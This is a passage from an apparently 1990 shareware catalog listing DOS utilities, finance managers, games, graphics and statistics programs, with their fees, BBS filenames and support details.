365day Fax support `817-249-4284' + Description: + Are there files that you need to just run ONCEADAY but run + every time your computer boots? Wasted Time! ONCEADAY will + easily allow you to run any file(s) just ONCEADAY. Ideal for + BACKUPs, REMINDERs, and any updating procedures. No need to + download 50K+ files or waste your valuable HD space. + ONCEADAY.COM is 643 bytes! + + Program: PALRUN [***] + Version: 2.0 (8/20/90) + Registration fee: $25 + BBS filename: PALRUN2A.ZIP, PALRUN2B.ZIP + User support: Registration provides the user with a password to + disable registration encouragements. Support via PAL BBS at + 914-762-8055 and via RIME BBS network. + Description: + PALRUN allows you to run any program or batch file out of any + ZIP, ARC, LZH, DWC or ZOO archive or view or edit a file out of + such an archive. Substantial DOS enhancements with replacement + command line. Change drive and directory, recall prior + commands, jump to new directory with a few keystrokes, multiple + commands per commandline and much more. + + -- page 40 -- + + + + Program: SWAPDT -- The SWAP Utilities + Version: 1.52 (09/16/90) + Registration Fee: $25 + BBS filename: SWDT15.COM + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + SWAPDT(TM) Version 1.52 allows you to run Central Point + Software's PCTOOLS desktop program in less than 7100 bytes! + SWAPDT is part of The SWAP Utilities(TM), and uses EMS, XMS, + hard disk or RAM disk. Self-Extracting LHARC File. SWAPDT + Supports the TesSeRact(TM) Standard for TSRs. Documentation is + stored in SWAPDO.COM as a separate archive. + + Program: SWAPMM -- The SWAP Utilities + Version: 1.52 (09/16/90) + Registration Fee: $25 + BBS filename: SWMM15.COM + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + SWAPMM(TM) Version 1.52 allows you to run Broderbund's + MemoryMate program in less than 6900 bytes! SWAPMM is part of + The SWAP Utilities(TM), and uses EMS, XMS, hard disk or RAM + disk. Self-Extracting LHARC File. SWAPMM Supports the + TesSeRact(TM) Standard for TSRs. Documentation is stored in + SWAPDO.COM as a separate archive. + + Program: SWAPMT -- The SWAP Utilities + Version: 1.52 (09/16/90) + Registration Fee: $25 + BBS filename: SWMT15.COM + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + SWAPMT(TM) Version 1.52 allows you to run Lotus Development + Corp's Metro and Express programs in less than 8300 bytes! + SWAPMT is part of The SWAP Utilities(TM), and uses EMS, XMS, + hard disk or RAM disk. Self-Extracting LHARC File. SWAPMT + Supports the TesSeRact(TM) Standard for TSRs. Documentation is + stored in SWAPDO.COM as a separate archive. + + -- page 41 -- + + + + Program: SWAPNG -- The SWAP Utilities + Version: 1.52 (09/16/90) + Registration Fee: $25 + BBS filename: SWNG15.COM + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + SWAPNG(TM) Version 1.52 allows you to run Peter Norton + Computing's Norton Guides program in less than 7100 bytes! + SWAPNG is part of The SWAP Utilities(TM), and uses EMS, XMS, + hard disk or RAM disk. Self-Extracting LHARC File. SWAPNG + Supports the TesSeRact(TM) Standard for TSRs. Documentation is + stored in SWAPDO.COM as a separate archive. + + Program: SWAPSH -- The SWAP Utilities + Version: 1.52 (09/16/90) + Registration Fee: $25 + BBS filename: SWSH15.COM + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + SWAPSH(TM) Version 1.52 allows you to run Central Point + Software's PCTOOLS Shell program in less than 7100 bytes! + SWAPSH is part of The SWAP Utilities(TM), and uses EMS, XMS, + hard disk or RAM disk. Self-Extracting LHARC File. SWAPSH + Supports the TesSeRact(TM) Standard for TSRs. Documentation is + stored in SWAPDO.COM as a separate archive. + + Program: SWAPSK -- The SWAP Utilities + Version: 1.52 (09/16/90) + Registration Fee: $25 + BBS filename: SWSK15.COM + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + SWAPSK(TM) Version 1.52 allows you to run Borland's Classic + SideKick(TM) program in less than 7100 bytes! SWAPSK is part + of The SWAP Utilities(TM), and uses EMS, XMS, hard disk or RAM + disk. Self-Extracting LHARC File. SWAPSK Supports the + TesSeRact(TM) Standard for TSRs. Documentation is stored in + SWAPDO.COM as a separate archive. + + -- page 42 -- + + + + Program: SWAPSP -- The SWAP Utilities + Version: 1.52 (09/16/90) + Registration Fee: $25 + BBS filename: SWSP15.COM + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + SWAPSP(TM) Version 1.52 allows you to run Borland's SideKick + Plus(R) program in less than 7400 bytes! SWAPSP is part of The + SWAP Utilities(TM), and uses EMS, XMS, hard disk or RAM disk. + Self-Extracting LHARC File. SWAPSP Supports the TesSeRact(TM) + Standard for TSRs. Documentation is stored in SWAPDO.COM as a + separate archive. + + Program: SWAPTN -- The SWAP Utilities + Version: 1.52 (09/16/90) + Registration Fee: $25 + BBS filename: SWTN15.COM + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + SWAPTN(TM) Version 1.52 allows you to run Micro Logic's + Tornado(TM) program in less than 6900 bytes! SWAPTN is part of + The SWAP Utilities(TM), and uses EMS, XMS, hard disk or RAM + disk. Self-Extracting LHARC File. SWAPTN Supports the + TesSeRact(TM) Standard for TSRs. Documentation is stored in + SWAPDO.COM as a separate archive. + + Program: TIMES2 + Version: 1.3/1.0a (06/14/89) + Registration fee: $20 + BBS filename: TIMES2.* + User support: Support available on CompuServe `70130,330', + American People Link `UNIQUESOFT', EXEC-PC `Charles Robertson', + 24hr 365day Fax support `817-249-4284' + Description: + TIMES2.ARC contains TWO date/time utilties. SETTIME (1.3 - 1312 + bytes) sets DOS' time AND DATE accurately via the US Naval + Observatory by modem. DTM (1.0 - 569 bytes) is a backup clock". + It will set DOS' date and time automatically at bootup. Both + utilities $20 Shareware. Unique Software - ASP Member + + -- page 43 -- + + + + Program: What's Up [***] + Version: 1.20 (09/03/90) + Registration fee: $20 + BBS filename: WHATSUP.* + User support: current disk and printed manual mailed out, one + year support by mail, registration good for all future + versions. + Description: + "What's Up" (tm) displays reminder messages on specified dates. + Simple to use, with many functional options: wild-card dates + and week days allow recurring reminders; user-specified look- + ahead displays messages several days ahead of specified date; + "missed" message feature displays messages that did not appear + when due if the program was not run; 3-month calendar + (optional); also displays reminders for any date; weekdays & + months in 5 languages. (Use text editor to enter reminders.) + + + FAX utilities + + Program: FAXCTRL.EXE + Version: 1.35 (03/10/90) + Registration fee: $22-$28 + BBS filename: FAXCTL.EXE + User support: Support available on CompuServe `70130,330', + American People Link `UNIQUESOFT', EXEC-PC `Charles Robertson', + 24hr 365day Fax support `817-249-4284' + Description: + FaxCtrl the popular shareware software FAX switch - new ver + 1.35! Fax, Ans Mach, or Voice and computer on ONE telephone + line - save in$tallation charges and extra monthly charge$ - + NOW support for ProComm 2.42+, ProComm 1.1A, 1.1B, TD, Cross + Talk, MIRROR, Qmodem, and Telix - doesn't use valuable DOS + memory (not a TSR) - self checks for viruses - self-extract LZW + archive + + + File utilities + + Program: Browser + Version: 3.2 + Registration fee: $20 (license only) to $35 (w/disk and manual) + BBS filename: BROW32.ARC + User support: Compuserve support at 72360,2335; Voice support; + Mail support; Registration good for all future versions. 90- + day money back gaureentee. + Description: + Browser is a MS Windows application designed to allow users to + view files in a variety of formats, including ANSI, ASCII, 7 + and 8 bit bytes, and as a hex dump. Features include printing + and clipboard update. A product of Wilson WindowWare. Normal + registration fees range between $20 (license only) and $35 (w/ + disk and manual). + + -- page 44 -- + + + + Program: ConvDW + Version: 1.2 (01/20/90) + Registration fee: $20 + BBS filename: CONVDW.ZIP + User support: Printed manual and current version sent. Support + through CompuServe EasyPlex, telephone, or mail. + vendors. + Description: + Converts IBM DisplayWrite 3 or 4 files to ASCII. It is the + best available program of this type. Can drop soft returns or + convert to hard returns. Can expand tabs to spaces or retain + them, drop other unwanted spaces, and mark font attributes such + as underlining. IBM does not publish the file format for + DisplayWrite, so ConvDW is one of only a handful of programs, + either shareware or commercial, that will read DW files. + + Program: JADU + Version: 1.3 + Registration fee: $25 + BBS filename: JADU11.ARC + User support: current version mailed out with printed docs; voice + support; new versions available at reduced rates, evaluation + copies available for $5 or by sending a disk & stamped mailer. + Description: + JADU version 1.3 - JADU is an intuitive file manager/shell. It + allows links to archive/compression utilities, file viewers, + editors, file finders, and print utilities. Also allows user + defined actions based upon the current directory and file + extension. Displays both a directory tree and a file list at + the same time. Microsoft mouse compatible, point and shoot + execution, and more. Uploaded by the author. + + Program: TextCon + Version: 1.7 (01/21/90) + Registration fee: $25 + BBS filename: TEXTCON.ZIP + User support: Printed manual and current version sent. Support + through CompuServe EasyPlex, telephone, or mail. + Description: + TextCon reformats ASCII or WordStar files for import to most + word processors. Among its features: strips carriage returns or + adds them, as needed; removes extraneous spaces; allows changes + in line and paragraph spacing. Its carriage-return stripping is + superb, properly handling almost any paragraph style. Saves + tremendous amounts of editing normally needed when importing + ASCII files. IBM DCA/RFT output option available separately. + + -- page 45 -- + + + + Program: TextOut/5 + Version: 1.3 (01/17/90) + Registration fee: $20 + BBS filename: TEXTOUT5.ZIP + User support: Printed manual and current version sent. Support + through CompuServe EasyPlex, telephone, or mail. + Description: + Converts WordPerfect 5.0 and 5.1 files to ASCII, with + improvements over WP's Text Out in both the DOS Text and + "generic" formats. Can expand tabs to spaces or retain them, + mark font attributes, and recover text from damaged files. + Converts footnotes, endnotes, tables, equations, and text + boxes, which are ignored by WP's Text Out. + + + Finances + + Program: CHEQUE-IT-OUT + Version: 1.0 + Registration fee: $39.95 + BBS filename: CHEQUE.ARC & CHEQUE2.ARC + User support: Free support (1 yr), Quarterly newsletters, FREE + latest version when you register, Additional bonus module, + Complete printed manual, Low cost upgrades, and make money with + our commission program. + Description: + 'CHEQUE-IT-OUT' is a personal, double-entry money-managing + system designed for non-accountants. 'CHEQUE-IT-OUT' combines + powerful bookkeeping methods with a full-featured, easy-to-use + design, perfect for novices as well as experts. Features: Pop- + up windows, On-line help, Prints personal checks, Complete + financial reports, Pre or Post date transactions. Tracks + Income, Expenses, Assets, Liabilities, Budgets, and Equity. + MANAGE YOUR MONEY LIKE A FINANCIAL WHIZ WITH....'CHEQUE-IT- + OUT'! + + Program: FastBucks + Version: 4.10 + Registration fee: $47.75 + BBS filename: FBK410_A.ZIP, FBK410_B.ZIP + User support: Telephone Support for registered users. All mail + regarding FastBucks operation is answered by author. + Description: + FastBucks Home Finance Manager Vers 4.10 Program that manages + 25 each checking, charge, savings,cash accounts. Generates a + Home budget and has a financial calculation section including a + complete loan amoritization schedule generator. For a + registration fee of $47.75 the author supplies a 226 page bound + user manual, a serialized diskette & telephone support for the + program. + + -- page 46 -- + + + + Program: FINANCE MANAGER II - General Ledger + Version: 1.3f + Registration fee: $49.95 + BBS filename: FMGL.ARC or FMGL-EXE.ARC + User support: Free support (1 yr), Quarterly newsletters, FREE + latest version when you register, Additional modules, Bound + manuals, Low cost upgrades, Discounts, and make money with our + commission program. + Description: + FINANCE MANAGER II is a professional small-business accounting + system designed for the non-accountant. Double entry. This + fully-integrated, menu-driven system combines the power and + sophistication of "Big Business" bookkeeping methods with a + simple, full-featured, easy-to-use design that is perfect for + individuals and small business people. Full range of financial + reports, budgets, allows pre/post dated transactions. ASP + Member. + + Program: FINANCE MANAGER II - Accounts Receivable + Version: 1.3f + Registration fee: $36.95 + BBS filename: FMAR.ARC or FMAR-EXE.ARC + User support: Free support (1 yr), Quarterly newsletters, FREE + latest version when you register, Additional modules, Bound + manuals, Low cost upgrades, Discounts, and make money with our + commission program. + Description: + FINANCE MANAGER II - ACCOUNTS RECEIVABLE This A/R module is + fully integrated to the Finance Manager II General Ledger (see + file "FMGL.ARC"). Features include: 2000 customers, 32,000 + entries/year, Invoices, Statements, Pre-printed or blank forms, + Finance charges, Pre-Post date entries, Labels, Many many + reports. In short, this Accounts Receivable is one of the + easiest-to-use, error-free ways to help you track all customer + receivable accounts. See FMAR-2.ARC. + + Program: FINANCE MANAGER II - Accounts Payable + Version: 1.3f + Registration fee: $36.95 + BBS filename: FMAP.ARC or FMAP-EXE.ARC + User support: Free support (1 yr), Quarterly newsletters, FREE + latest version when you register, Additional modules, Bound + manuals, Low cost upgrades, Discounts, and make money with our + commission program. + Description: + FINANCE MANAGER II - ACCOUNTS PAYABLE. This A/P module is fully + integrated to the Finance Manager II General Ledger (see file + "FMGL.ARC"). Features include: 2000 Vendors, 32,000 entries, + Manual or Computer printed checks, Discounts, Partial payments, + Many payment options, Pre/post date entries, Labels, Many + reports. This A/P module is one of the easiest-to-use, error- + free ways of tracking and paying your invoices. See FMAP-2.ARC, + Shareware. + + -- page 47 -- + + + + Program: QPACS + Version: 3.0 (10/30/89) + Registration fee: $22 + BBS filename: ?? + User support: Telephone support provided for registered users + Description: + QPACS is designed to provide financial management functions for + families and individuals. Functions: Checkbook Management, + Check Printing, Recurring Check file, Check Registers, Budgets + and Expense/Budget Reports, Assets, Liabilities, Investments, + Household Inventory, Net Worth, Federal Income Taxes, Index + Card File + + Program: PCBUDGET + Version: 1.1 (02/17/90) + Registration Fee: $35 + BBS filename: PCBUDGET.ARC + User support: Registered users will receive a printed manual, a + new 'registered copy' of the latest version of PCBUDGET, and + free technical support. + Description: + PCBUDGET v1.1 is a Complete Home Financial Management Program. + PCBUDGET is easy to use right from the start. All functions + are selected from pull down menus. An on-line tutorial can be + selected at any time. PCBUDGET FEATURES: Payment Reminders, + Automatic Transactions, Many types of Financial Reports, Bank + Reconciliation, Taxable items, Print Checks, View Bar Graphs in + VGA EGA CGA or HERC. Loan Amortization, Mouse Support, and much + much more. You must try it! + + + Form processing + + Program: FormGen [***] + Version: 4.1a (08/??/90) + Registration fee: $35 + BBS filename: FORM41.EXE + User support: Bound manual, latest version, unlimited free phone + support, CIS membership, discounts on commercial products. + Description: + FormGen is the world's most popular form drawing package. This + powerful, yet easy-to-use package works like a word processor, + but has many features specially geared to designing forms. + Using the full screen editor, you can quickly draw lines and + boxes and position text. You then print the form on your Epson, + IBM or HP type printer. The printed results are amazing! + Professional quality forms can be designed and printed in + minutes. NEW! Ver 4 adds full HP laser support, allows forms to + 17" wide. + + -- page 48 -- + + + + Program: FormGen Fill [***] + Version: 1.4a (08/??/90) + Registration fee: $35 + BBS filename: FILL14.EXE + User support: Bound manual, latest version, unlimited free phone + support, CIS membership, discounts on commercial products. + Description: + From the makers of FormGen, the world's most popular form + drawing system, comes FormGen Fill - a powerful, yet easy-to- + use form filling system. This FormGen companion puts data areas + on your forms. The form may then be filled & printed - picture + perfect every time. Features: muti-line fields, calculations, + date & time and much more. Context sensitive help makes it easy + to learn and use. Forms are printed on your Epson, IBM, or HP + printer. + + + Games & Leisure + + Program: ATC + Version: v1.0 (5/1/85) + Registration fee: ?? + BBS filename: ATC.ARC + User support: Unlimited CIS email support for registered users. + Send email to 76703,3046. + Description: + ATC -- An air traffic controller game that's perfect for a few + minutes or hours of fun. Easy to learn, but difficult to + master. The game tracks best scores at each of 20 levels of + difficulty. (Supports monochrome) + + Program: BASSMAP + Version: 1.0 (05/25/89) + Registration fee: $15 + BBS filename: BASSMAP.ZIP + User support: Registered users receive the latest version of the + game as well as any support needed by mail. Support is also + provided through a support BBS + Description: + BassMap is a utility program that works with Dick Olsen's + BassTour fishing simulation game. BassMap allows players to + create their own BassTour lakes or to change existing lakes. + Requires EGA or CGA graphics, keyboard input. + + Program: BORDER + Version: v1.1 (8/1/88) + Registration fee: ?? + BBS filename: BORDER.ARC + User support: Unlimited CIS email support for registered users. + Send email to 76703,3046. + Description: + BORDER -- a combination of GO and connect the dots, this + abstract strategy game requires you to enclose more area than + your opponent, while preventing them from stopping you. + + -- page 49 -- + + + + Program: CIPHER + Version: 1.2 (04/18/90) + Registration fee: $15 + BBS filename: CIPHER12.ZIP + User support: Registered users receive the latest version of the + game as well as any support needed by mail. Support is also + provided through a support BBS + Description: + CIPHER is a crypto-quotes type word puzzle game, similar to the + kind you might find in the Sunday newspaper. However, this + version runs in colorful hi-res VGA or EGA graphics mode and + allows you to play using a mouse (text modes and keyboard are + also supported). Features include help, hints, save/restore. + + Program: CROSSWORD CREATOR + Version: 4.00 + Registration fee: $20.00 + BBS filename: CWC400.ZIP + User support: current version always provided; CIS support; phone + and mail support; SUPPORT disk includes desktop publishing + utility and doc "print" program. + Description: + CROSSWORD CREATOR is a crossword puzzle "editor" that provides + you with all the tools you need to quickly design and print + your own crosswords. Features: automatic word placement; laser + printer support; multi-line clues; foreign-language support; + windowed, mouse-driven user-interface; supports WORDFIND files. + Great for teachers, language students, amateur and professional + crossword builders. Version 4.00, uploaded by author. Also + available from PC-SIG. + + Program: CURSES! + Version: 1.0 + Registration fee: $10.00 + BBS filename: CURSES.ZIP + User support: Current disk is mailed out; mail support; some + voice support; registration includes subscription to newsletter + Description: + One reviewer called this "the meanest program we've ever seen", + but it's actually quite funny. A humorous and creative "insult + generator" with a different twist -- a single keystroke + switches from insults to compliments. Phrases are randomly + generated based on a vivid vocabulary. You can change the + contents, so the program can be used to create colorful phrases + on any subject. + + -- page 50 -- + + + + Program: ECOMASTER + Version: v1.1 (10/31/89) + Registration fee: ?? + BBS filename: ECO.ARC + User support: Unlimited CIS email support for registered users. + Send email to 76703,3046. + Description: + ECOMASTER -- A diverting ecology game in which you buy and sell + animals based on their abilities to thrive in different + environments. Mildly educational without belaboring the point. + + Program: EGATrek + Version: 2.1 (11/01/90) + Registration fee: $15 + BBS filename: EGATRK21.ZIP + User support: Registered users receive the latest version of the + game as well as any support needed by mail. Support is also + provided through a support BBS + Description: + EGATrek is a colorful, hi-res version of this classic computer + game. The player is put in control of a powerful starship in a + battle to save the universe. The computer screen simulates the + captain's command console with scanners, messages, damage + control and even a view outside the ship. Score is based on the + time needed to complete the mission with bonuses for rescues, + ships destroyed, etc. Supports only EGA graphics and only a + keyboard is required for input. + + Program: FICTIONARY + Version: v1.2 (11/4/89) + Registration fee: ?? + BBS filename: FICT.ARC + User support: Unlimited CIS email support for registered users. + Send email to 76703,3046. + Description: + FICTIONARY -- The game of fantastic and farfetched + definitions. Each round one player chooses a word that none of + the players knows. You can choose your own word or pick one + from the large selection included with the game. Then each + other player makes up their own definition for the word. + Everyone votes for the word they think is the correct + definition and points are scored for guessing the proper one, + or misleading other players. Special rules allow play by 2 or + even 1 player. + + -- page 51 -- + + + + Program: HARD AT WORK + Version: 1.0 + Registration Fee: $0 + BBS filename: HAW.ZIP + User support: By mail. Newsletter is available. + Description: + HARD AT WORK ties up your computer with a Very Important task + while you take a break. You can choose from 7 official-looking + jobs, or the program will pick one at random. If someone tries + to interrupt the program, you're warned by a beep, and they get + a DANGER message. The imaginary work continues busily until you + stop it. + + Program: Hearts + Version: 6a (11/17/89) + Registration fee: $15 + BBS filename: HEART6.ARC + User support: Notification of new releases and were available; + one FREE upgrade on disk with the purchase of a disk from the + author; registration good for all future versions; Support via + CIS and U.S. Mail. + Description: + Excellent rendition of the classic card game of Hearts. You + plan your strategy against three computer players. The stand + ard three card pass provides intrigue and an opportunity to + control your opponents play. The use of a mouse or the cursor + keys is all you need for easy game play. Several options allow + modification of game play to your liking. Colorful screens and + ease of use make Hearts a delight to play. No graphics but a + color monitor is required. Supports CGA/EGA/VGA. Enjoy. + + Program: HUGO'S HOUSE OF HORRORS + Version: 1.3 (05/01/90) + Registration fee: $20 + BBS filename: HUGO.EXE + User support: Current registered disk is mailed out; FREE Hint + Book; FREE new game (when available); Telephone support; BBS + support. + Description: + An exciting and challenging adventure game for all ages. Using + a combination of colorful 3-D animated graphics and text. You + control HUGO'S destiny as he tries to rescue his sweetheart, + Penelope, imprisoned somewhere inside the haunted house, and + must solve the various puzzles and challenges encountered + during his quest. (ASP). Requires EGA, 360Kb ram and 850Kb + disk space ! v1.3 adds corruption protection. Self-extracting + archive. + + -- page 52 -- + + + + Program: Klondike + Version: 2.3 (09/17/89) + Registration fee: $15 + BBS filename: KLONDK23.* + User support: User support is provided by mail and on-line on + CompuServe and GEnie. Registration good for all future + versions. + Description: + Excellent implementation of the classic Klondike solitaire card + game. Outstanding EGA graphics, full mouse support, user- + selectable card designs and rules. Requires 256 KBytes of + available memory, and EGA or VGA display. Microsoft-compatible + mouse optional. Two registration options: $15 (registration + only) and $20 (registration, latest version on disk, and + printed manual). + + Program: Lovedos + Version: 1.1 + Registration fee: $0 + BBS filename: LOVEDOS.ZIP + User support: Support by mail. Subscription to newsletter is + available. + Description: + One of Shareware Magazines top 10 "Fun and Games" programs + (Dec. 89). Unlike practical joke programs that take over the + DOS prompt and insult the user, this uncooperative program + drowns the user in love, affection, and passion! Harmless + practical joke. + + Program: MAH JONGG + Version: 3.3 (03/22/90) + Registration fee: $15 + BBS filename: MAHJNG33.ZIP + User support: Registered users receive the latest version of the + game as well as any support needed by mail. Support is also + provided through a support BBS + Description: + Mah Jongg is a highly addictive solitaire game played with + colorful Chinese tiles. The challenge is to remove all the + tiles from the playing surface. It sounds easy to play (and it + is), but winning is always a challenge. The game supports EGA, + VGA and Hercules graphics, mouse or keyboard input. Now also + supports loadable tile sets (one extra set included) as well as + an editor with which players can create their own tiles. + + -- page 53 -- + + + + Program: NAMEGRAM + Version: 3.0 + Registration fee: $25 + BBS filename: NAMEGM.ARC + User support: registered users get latest version on disk; + support via EASYPLEX [72241,50], MCImail [NRubenking], or U.S. + mail (Neil J. Rubenking, 86 Midcrest Way, S.F. CA 94131) + Description: + NAMEGRAM 3.0 takes any name or phrase and makes anagrams of it + using a 90,000-word dictionary. E.g. "TURBO PASCAL" becomes + "LABORS AT CPU". Menu-driven, supports mouse, works with text + screen sizes from 80x25 to 132x43. You build the anagrams + yourself OR let NAMEGRAM do it for you. Requires 256K, two + floppies or hard disk. Registration gets 100,000-word + dictionary, utility to add/remove words from the dictionary. + Author: Neil J. Rubenking. + + Program: POETRY GENERATOR + Version: 1.1 + Registration fee: $29.00 + BBS filename: POETRY.ZIP + User support: Newest version is mailed; mail support; some voice + support; registration includes newsletter subscription + Description: + Turn your computer into a poet! POETRY GENERATOR creates free- + verse poems at the touch of a button. Using the structre of + actual poems as models, the program randomly combines words and + short phrases into verses four to nine lines long. Some of + these have been published in national magazines. Requires hard + disk. + + Program: Poker Solitaire + Version: 2.0 (08/14/89) + Registration fee: $15 + BBS filename: PKRSOL20.* + User support: Mail and on-line (CompuServe and GEnie) support. + Registration good for all future versions. + Description: + Poker Solitaire is a solitaire card game that rewards both + lucky guessing and accurate calculation of odds. Cards are + placed one by one on a 5 x 5 grid. The object of the game is to + make as high a score as possible, counting each row and column + as a Poker hand. Three different variations and two scoring + systems can be used. Outstanding EGA graphics, full mouse + support (mouse is optional). $15 (registration only) or $20 + (registration, latest version on disk and printed manual). + + -- page 54 -- + + + + Program: SHOOTING GALLERY + Version: 2.1 (06/13/90) + Registration fee: $15 + BBS filename: SHOOTG21.ZIP + User support: Registered users receive the latest version of the + game as well as any support needed by mail. Support is also + provided through a support BBS + Description: + Shooting Gallery is an action/arcade game, one of the first to + support 256 color MCGA graphics mode. Seven rounds of play are + included, with different targets and objectives on each round + Includes practice mode, high score hall of fame, extensive + statistics, etc. Requires VGA or MCGA graphics and a mouse to + play. + + Program: SUPERFLY + Version: 1.0 (07/07/90) + Registration fee: $15 + BBS filename: SFLY10.ZIP + User support: Registered users receive the latest version of the + game as well as any support needed by mail. Support is also + provided through a support BBS + Description: + SuperFly v1.0 is an all new action game by Nels Anderson, + author of Mah Jongg, EGATrek, etc. Uses hi-res graphics mode + and requires an EGA or VGA card to play. Chase the flies and + other insect invaders through 20 different rounds. Includes 3 + levels of difficulty, shell to DOS, high score hall of fame, + etc. + + Program: the last word + Version: 1.00 (07/24/90) + Registration fee: $15 + BBS filename: LWORD100.ZIP + User support: Phone support; BBS support; Upgrade disks + available; Unconditional 30-day money back guarantee + Description: + 'the last word' is a quotations trivia game in which 1 to 4 + players compete against each other and their own high scores in + identifying the source of quotations and completing partial + quotes. Most answers are entered free-form and are matched + against a set of acceptable responses with a sophisticated + pattern-recognition algorithm. 'the last word' runs in text + mode -- including on mono displays -- and offers a high level + of user configurability. + + -- page 55 -- + + + + Program: WORLD NAME GAME + Version: 2 (06/23/90) + Registration fee: $10 + BBS filename: WNG2.EXE + User support: Inquiries responded to in writing. Custom + configurations available. Special licenses for educational + facilities. + Description: + WORLD NAME GAME is an educational program in a form which + appeals to children. It provides the user with maps of areas + surrounding national and state capitals and challenges him to + name country, state, or city. The maps permit the user to learn + countries and cities in relation to the surrounding + territories. This methodology increases the learning rate and + facilitates recognition. + + + Graphics + + Program: FLODRAW + Version: 2.11 (11/11/89) + Registration fee: $25.00 + BBS filename: FLODRAW1.*,FLODRAW2.*,FLODRAW3.* + User support: Support by mail or Compuserve. Current disks and + printed documentation available. Users notified about updates. + Description: + FLODRAW is a diagram drawing program that prints full page + black & white diagrams like flowcharts, electrical diagrams, + and system diagrams. Menu driven and easy to use. Includes + tutorials, sample diagrams, symbol libraries for flowcharts, + electrical diagrams, data flow diagrams and organization + charts. Requires: IBM PC/XT/AT or PS/2 or compatible; 384k; DOS + 2 or 3; CGA only; no mouse. Printers supported: Epson MX/FX/LQ, + Toshiba P3x1, HP DeskJet/LaserJet+ & II. + + Program: Magic Brush + Version: 1.50 (08/16/89) + Registration fee: $20.00 + BBS filename: MB150.* + User support: Detailed Reference Manual (more than 50 pp), one + year support by mail, reduced upgrade fees. + Description: + MAGIC BRUSH/MAGIC SHOW drawing/painting and slide show programs + for medium resolution CGA. Many features include versatile + cut-&-paste, status screen for accurate drawing & pasting, two + drawing screens, simple animation, etc. Includes tutorial and + SNAPSHOT screen capture utility. + + -- page 56 -- + + + + Program: PathProj + Reason for version: Minor enhancement of ver.8911 allowing + printing and saving of path projection displays that have been + interactively annotated by the user. + Registration fee: $25 + BBS filename: SRXPATH.EXE + User support: Printed documentation and update notices are mailed + out; no time limit on mailed-in questions; user feedback + requested. + Description: + Interactive CGA graphical displays of the orthogonal projection + of ridge shrinkage path statistics (coefficients, inferior + direction, regressor coordinates) onto any 2-dimensional linear + subspace. Literally "watch" the inferior direction change as + you move along the ridge shrinkage path. Self-extracting LZH- + archive. + + Program: PC-Draft II + Version: 3.2 (07/03/88) + Registration fee: $50 + BBS filename: PC-DRAFT.ARC + User support: Current disk & typset manual is mailed; voice + support; Bug fixes mailed to all users; upgrades cost $15. + Email support via Compuserve + Description: + PC-Draft II Paint, drawing, charting program. Includes graphics + and text screen capture & the PIX graphics language for + animated slideshows. Exports in GEM .IMG format - perfect for + Ventura Publisher or WordPerfect 5.0. Supports Epson, Okidata, + Microlin LaserJet+, DeskJet. Draw circles, lines, boxes, shaded + rectang. curves, ellipses, spray paint, and free form drawing; + line, bar pie graphs. Edit fill patterns and fonts. Keyboard + macros. CGA or better (works with HGCIBM/Hercules). DL PCDOBJ: + clipart. + + Program: Recursive Realm + Version: 2.0 (07/01/90) + Registration fee: $20 + BBS filename: RREALM.ZIP + User support: Current disk is mailed out; voice support; + immediate notification of upgrade; upgrade fee is only $2.00; + CIS support [71241,1121], [Scott Jones] + Description: + Recursive Realm is a detailed Fractal generation and + exploration program. It allows you to build and blow-up + Mandelbrot Sets, Julia Sets (5 functions), Newtons Method (13 + functions), and Models of Magnetism. It runs from a user- + friendly front-end and allows image saving at any stage of + development, on-screen zooming, transcendental functions, + escape sequence tracking, random colorization, slide show + animation, unattended development. PCX format. Requires EGA or + VGA. + + -- page 57 -- + + + + Program: RelaxR + Reason for version: Original release. Revised version 9002 + (Feb.1990) using Microsoft Fortran 5.0 huge model available + from author for regression models with up to 25 variables and + 150 observations. + Registration fee: $0 + BBS filename: RELAXR89.EXE + User support: Printed documentation and update notices are mailed + out; no time limit on mailed-in questions; user feedback + requested. + Description: + Detailed ridge regression computations for any shrinkage path + in the 2-parameter generalized ridge family and creation of + ASCII files of the exact form needed for input to RXtraces and + PathProj. Fortran source code provided free on written + request. Companion RELAXDOC.EXE gives complete ASCII + documentation and formatted input files for 15 well-known + numerical examples from statistical literature of ill- + conditioned regressions. Self-extracting LZH-archives. + + Program: RXtraces + Reason for version: Minor enhancement of ver.8911 allowing + printing and saving of ridge trace displays that have been + interactively annotated by the user. + Registration fee: $25 + BBS filename: SRXTRACE.EXE + User support: Printed documentation and update notices are mailed + out; no time limit on mailed-in questions; user feedback + requested. + Disks needed: 1 + Description: + Interactive CGA graphical displays of 5 types of ridge TRACES: + regression coefficients, scaled mean squared errors, excess + (OLS-ridge) eigenvalues, inferior direction cosines, and + shrinkage pattern. Ideal for training, i.e. review RelaxR + outputs across a spectrum of previously computed numerical + examples. Self-extracting LZH-archive. + + + Income taxes + + Program: Home Office Tax Deduction Calculator 1989 + Version: 1989.1C (01/31/90) + Registration Fee: $18 + BBS filename: HOT89C.ZIP + User support: Free telephone support for one year. Update + notices annually. Upon registration most recent version is sent + along with thank you letter. Can Beta test new versions. + Description: + Calculates Home Office Tax Deductions for tax year 1990. + Also calculates depreciation or rent deductions. Computes all + allowances based on raw data entered. Eliminates costly errors + from confusion. All depreciation conventions since 1940 sup- + ported. Prints worksheet, instructions, and statement to attach + + -- page 58 -- + + + + to tax returns, or give to preparer to save money. Provides data + entry all in one screen (full screen editing) and context + sensitive HELP system. + + + Keyboard macros + + + Labels & mailing lists + + Program: FBNCAT + Version: 2.2 + Registration fee: 15.00 + BBS filename: FBNCAT.ARC + User support: CIS support ID 74746,250 voice support and mail + Current disk sent to all registrations. + 